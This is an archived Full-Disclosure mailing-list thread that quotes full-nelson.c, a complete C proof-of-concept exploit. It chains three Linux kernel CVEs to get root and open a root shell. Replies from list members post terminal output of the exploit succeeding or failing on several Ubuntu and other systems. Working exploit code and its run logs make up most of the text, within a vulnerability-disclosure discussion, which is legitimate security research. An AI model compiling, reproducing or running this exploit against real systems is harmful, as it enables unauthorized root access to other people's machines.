[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Linux kernel exploit
- To: David Flores <dmousex@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Linux kernel exploit
- From: Rem7ter <rem7ter@xxxxxxxxx>
- Date: Wed, 8 Dec 2010 19:03:09 -0800
Failed on Ubuntu 10.10
"
uname -a;
Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC
2010 i686 GNU/Linux
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0858340
[+] Resolved econet_ops to 0xe0858440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Exploit failed to get root.
"
2010/12/8 David Flores <dmousex@xxxxxxxxx>
>
> :~$ gcc nel.c
> :~$ ./a.out
> [*] Resolving kernel addresses...
> [+] Resolved econet_ioctl to 0xf9c47280
> [+] Resolved econet_ops to 0xf9c47360
> [+] Resolved commit_creds to 0xc01625a0
> [+] Resolved prepare_kernel_cred to 0xc01627a0
> [*] Calculating target...
> [*] Triggering payload...
> [*] Got root!
> # whoami
>
> root
> # id
> uid=0(root) gid=0(root)
> # uname -a
> Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC
> 2010 i686 GNU/Linux
> #
>
> On Wed, Dec 8, 2010 at 14:56, Benji <me@xxxxxxxxx> wrote:
>
>> working here aswell
>>
>> ownsthis@local[~]$ uname -a
>> FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23
>> 08:30:18 UTC 2010 root@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC
>> amd64
>> ownsthis@local[~]$ ./w00tw00t
>>
>> [*] Resolving kernel addresses...
>> [+] Resolved econet_ioctl to 0xffffffffa0239510
>> [+] Resolved econet_ops to 0xffffffffa0239600
>> [+] Resolved commit_creds to 0xffffffff8108bd90
>> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170
>> [*] Calculating target...
>>
>> [*] Failed to set Econet address.
>> [*] Triggering payload...
>> [*] Got root!
>> # id
>> uid=0(root) gid=0(root)
>> #
>>
>> On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista <
>> leandro_lista@xxxxxxxxxxxxxx> wrote:
>>
>>> Works in kernel 2.6.32-24
>>>
>>>
>>>
>>> Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40
>>> UTC 2010 x86_64 GNU/Linux
>>>
>>> indzin@indzin-desktop:~$ ./nels
>>> [*] Resolving kernel addresses...
>>> [+] Resolved econet_ioctl to 0xffffffffa0239510
>>> [+] Resolved econet_ops to 0xffffffffa0239600
>>> [+] Resolved commit_creds to 0xffffffff8108bd90
>>> [+] Resolved prepare_kernel_cred to 0xffffffff8108c170
>>> [*] Calculating target...
>>>
>>> [*] Failed to set Econet address.
>>> [*] Triggering payload...
>>> [*] Got root!
>>> # id
>>> uid=0(root) gid=0(root)
>>> #
>>>
>>>
>>> :)
>>>
>>>
>>>
>>>
>>> -----Original Message-----
>>> *From*: Cal Leeming [Simplicity Media Ltd] <
>>> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx<%22Cal%20Leeming%20%5bSimplicity%20Media%20Ltd%5d%22%20%3ccal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx%3e>
>>> >
>>> *Reply-to*: cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx
>>> *To*: Dan Rosenberg
>>> <dan.j.rosenberg@xxxxxxxxx<Dan%20Rosenberg%20%3cdan.j.rosenberg@xxxxxxxxx%3e>
>>> >
>>> *Cc*: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
>>> *Subject*: Re: [Full-disclosure] Linux kernel exploit
>>> *Date*: Tue, 07 Dec 2010 21:06:44 +0000
>>>
>>> Anyone tested this in sandbox yet?
>>>
>>> On 07/12/2010 20:25, Dan Rosenberg wrote:
>>> > Hi all,
>>> >
>>> > I've included here a proof-of-concept local privilege escalation exploit
>>> > for Linux. Please read the header for an explanation of what's going
>>> > on. Without further ado, I present full-nelson.c:
>>> >
>>> > Happy hacking,
>>> > Dan
>>> >
>>> >
>>> > --snip--
>>> >
>>> > /*
>>> > * Linux Kernel<= 2.6.37 local privilege escalation
>>> > * by Dan Rosenberg
>>> > * @djrbliss on twitter
>>> > *
>>> > * Usage:
>>> > * gcc full-nelson.c -o full-nelson
>>> > * ./full-nelson
>>> > *
>>> > * This exploit leverages three vulnerabilities to get root, all of
>>> > which were
>>> > * discovered by Nelson Elhage:
>>> > *
>>> > * CVE-2010-4258
>>> > * -------------
>>> > * This is the interesting one, and the reason I wrote this exploit. If
>>> > a
>>> > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a
>>> > NULL
>>> > * word will be written to a user-specified pointer when that thread
>>> > exits.
>>> > * This write is done using put_user(), which ensures the provided
>>> > destination
>>> > * resides in valid userspace by invoking access_ok(). However, Nelson
>>> > * discovered that when the kernel performs an address limit override via
>>> > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page
>>> > fault,
>>> > * etc.), this override is not reverted before calling put_user() in the
>>> > exit
>>> > * path, allowing a user to write a NULL word to an arbitrary kernel
>>> > address.
>>> > * Note that this issue requires an additional vulnerability to trigger.
>>> > *
>>> > * CVE-2010-3849
>>> > * -------------
>>> > * This is a NULL pointer dereference in the Econet protocol. By
>>> > itself, it's
>>> > * fairly benign as a local denial-of-service. It's a perfect candidate
>>> > to
>>> > * trigger the above issue, since it's reachable via sock_no_sendpage(),
>>> > which
>>> > * subsequently calls sendmsg under KERNEL_DS.
>>> > *
>>> > * CVE-2010-3850
>>> > * -------------
>>> > * I wouldn't be able to reach the NULL pointer dereference and trigger
>>> > the
>>> > * OOPS if users weren't able to assign Econet addresses to arbitrary
>>> > * interfaces due to a missing capabilities check.
>>> > *
>>> > * In the interest of public safety, this exploit was specifically
>>> > designed to
>>> > * be limited:
>>> > *
>>> > * * The particular symbols I resolve are not exported on Slackware or
>>> > Debian
>>> > * * Red Hat does not support Econet by default
>>> > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu
>>> > and
>>> > * Debian
>>> > *
>>> > * However, the important issue, CVE-2010-4258, affects everyone, and it
>>> > would
>>> > * be trivial to find an unpatched DoS under KERNEL_DS and write a
>>> > slightly
>>> > * more sophisticated version of this that doesn't have the roadblocks I
>>> > put in
>>> > * to prevent abuse by script kiddies.
>>> > *
>>> > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>>> > *
>>> > * NOTE: the exploit process will deadlock and stay in a zombie state
>>> > after you
>>> > * exit your root shell because the Econet thread OOPSes while holding
>>> > the
>>> > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't
>>> > bother.
>>> > *
>>> > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>>> > */
>>> >
>>> > #include<stdio.h>
>>> > #include<sys/socket.h>
>>> > #include<fcntl.h>
>>> > #include<sys/ioctl.h>
>>> > #include<string.h>
>>> > #include<net/if.h>
>>> > #include<sched.h>
>>> > #include<stdlib.h>
>>> > #include<signal.h>
>>> > #include<sys/utsname.h>
>>> > #include<sys/mman.h>
>>> > #include<unistd.h>
>>> >
>>> > /* How many bytes should we clear in our
>>> > * function pointer to put it into userspace? */
>>> > #ifdef __x86_64__
>>> > #define SHIFT 24
>>> > #define OFFSET 3
>>> > #else
>>> > #define SHIFT 8
>>> > #define OFFSET 1
>>> > #endif
>>> >
>>> > /* thanks spender... */
>>> > unsigned long get_kernel_sym(char *name)
>>> > {
>>> > FILE *f;
>>> > unsigned long addr;
>>> > char dummy;
>>> > char sname[512];
>>> > struct utsname ver;
>>> > int ret;
>>> > int rep = 0;
>>> > int oldstyle = 0;
>>> >
>>> > f = fopen("/proc/kallsyms", "r");
>>> > if (f == NULL) {
>>> > f = fopen("/proc/ksyms", "r");
>>> > if (f == NULL)
>>> > goto fallback;
>>> > oldstyle = 1;
>>> > }
>>> >
>>> > repeat:
>>> > ret = 0;
>>> > while(ret != EOF) {
>>> > if (!oldstyle)
>>> > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy,
>>> > sname);
>>> > else {
>>> > ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>>> > if (ret == 2) {
>>> > char *p;
>>> > if (strstr(sname, "_O/") || strstr(sname,
>>> > "_S."))
>>> > continue;
>>> > p = strrchr(sname, '_');
>>> > if (p> ((char *)sname + 5)&& !strncmp(p - 3,
>>> > "smp", 3)) {
>>> > p = p - 4;
>>> > while (p> (char *)sname&& *(p - 1) ==
>>> > '_')
>>> > p--;
>>> > *p = '\0';
>>> > }
>>> > }
>>> > }
>>> > if (ret == 0) {
>>> > fscanf(f, "%s\n", sname);
>>> > continue;
>>> > }
>>> > if (!strcmp(name, sname)) {
>>> > fprintf(stdout, " [+] Resolved %s to %p%s\n", name,
>>> > (void *)addr, rep ? " (via System.map)" : "");
>>> > fclose(f);
>>> > return addr;
>>> > }
>>> > }
>>> >
>>> > fclose(f);
>>> > if (rep)
>>> > return 0;
>>> > fallback:
>>> > uname(&ver);
>>> > if (strncmp(ver.release, "2.6", 3))
>>> > oldstyle = 1;
>>> > sprintf(sname, "/boot/System.map-%s", ver.release);
>>> > f = fopen(sname, "r");
>>> > if (f == NULL)
>>> > return 0;
>>> > rep = 1;
>>> > goto repeat;
>>> > }
>>> >
>>> > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long
>>> > cred);
>>> > typedef unsigned long __attribute__((regparm(3))) (*
>>> > _prepare_kernel_cred)(unsigned long cred);
>>> > _commit_creds commit_creds;
>>> > _prepare_kernel_cred prepare_kernel_cred;
>>> >
>>> > static int __attribute__((regparm(3)))
>>> > getroot(void * file, void * vma)
>>> > {
>>> >
>>> > commit_creds(prepare_kernel_cred(0));
>>> > return -1;
>>> >
>>> > }
>>> >
>>> > /* Why do I do this? Because on x86-64, the address of
>>> > * commit_creds and prepare_kernel_cred are loaded relative
>>> > * to rip, which means I can't just copy the above payload
>>> > * into my landing area. */
>>> > void __attribute__((regparm(3)))
>>> > trampoline()
>>> > {
>>> >
>>> > #ifdef __x86_64__
>>> > asm("mov $getroot, %rax; call *%rax;");
>>> > #else
>>> > asm("mov $getroot, %eax; call *%eax;");
>>> > #endif
>>> >
>>> > }
>>> >
>>> > /* Triggers a NULL pointer dereference in econet_sendmsg
>>> > * via sock_no_sendpage, so it's under KERNEL_DS */
>>> > int trigger(int * fildes)
>>> > {
>>> > int ret;
>>> > struct ifreq ifr;
>>> >
>>> > memset(&ifr, 0, sizeof(ifr));
>>> > strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
>>> >
>>> > ret = ioctl(fildes[2], SIOCSIFADDR,&ifr);
>>> >
>>> > if(ret< 0) {
>>> > printf("[*] Failed to set Econet address.\n");
>>> > return -1;
>>> > }
>>> >
>>> > splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
>>> > splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
>>> >
>>> > /* Shouldn't get here... */
>>> > exit(0);
>>> > }
>>> >
>>> > int main(int argc, char * argv[])
>>> > {
>>> > unsigned long econet_ops, econet_ioctl, target, landing;
>>> > int fildes[4], pid;
>>> > void * newstack, * payload;
>>> >
>>> > /* Create file descriptors now so there are two
>>> > references to them after cloning...otherwise
>>> > the child will never return because it
>>> > deadlocks when trying to unlock various
>>> > mutexes after OOPSing */
>>> > pipe(fildes);
>>> > fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
>>> > fildes[3] = open("/dev/zero", O_RDONLY);
>>> >
>>> > if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) {
>>> > printf("[*] Failed to open file descriptors.\n");
>>> > return -1;
>>> > }
>>> >
>>> > /* Resolve addresses of relevant symbols */
>>> > printf("[*] Resolving kernel addresses...\n");
>>> > econet_ioctl = get_kernel_sym("econet_ioctl");
>>> > econet_ops = get_kernel_sym("econet_ops");
>>> > commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
>>> > prepare_kernel_cred = (_prepare_kernel_cred)
>>> > get_kernel_sym("prepare_kernel_cred");
>>> >
>>> > if(!econet_ioctl || !commit_creds || !prepare_kernel_cred ||
>>> > !econet_ops) {
>>> > printf("[*] Failed to resolve kernel symbols.\n");
>>> > return -1;
>>> > }
>>> >
>>> > if(!(newstack = malloc(65536))) {
>>> > printf("[*] Failed to allocate memory.\n");
>>> > return -1;
>>> > }
>>> >
>>> > printf("[*] Calculating target...\n");
>>> > target = econet_ops + 10 * sizeof(void *) - OFFSET;
>>> >
>>> > /* Clear the higher bits */
>>> > landing = econet_ioctl<< SHIFT>> SHIFT;
>>> >
>>> > payload = mmap((void *)(landing& ~0xfff), 2 * 4096,
>>> > PROT_READ | PROT_WRITE | PROT_EXEC,
>>> > MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
>>> >
>>> > if ((long)payload == -1) {
>>> > printf("[*] Failed to mmap() at target address.\n");
>>> > return -1;
>>> > }
>>> >
>>> > memcpy((void *)landing,&trampoline, 1024);
>>> >
>>> > clone((int (*)(void *))trigger,
>>> > (void *)((unsigned long)newstack + 65536),
>>> > CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
>>> > &fildes, NULL, NULL, target);
>>> >
>>> > sleep(1);
>>> >
>>> > printf("[*] Triggering payload...\n");
>>> > ioctl(fildes[2], 0, NULL);
>>> >
>>> > if(getuid()) {
>>> > printf("[*] Exploit failed to get root.\n");
>>> > return -1;
>>> > }
>>> >
>>> > printf("[*] Got root!\n");
>>> > execl("/bin/sh", "/bin/sh", NULL);
>>> > }
>>> >
>>> >
>>> > _______________________________________________
>>> > Full-Disclosure - We believe in it.
>>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> > Hosted and sponsored by Secunia - http://secunia.com/
>>> >
>>>
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
> --
> David Flores Velázquez
> Email: dmousex@xxxxxxxxx
>
> <http://twitter.com/dmouse>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/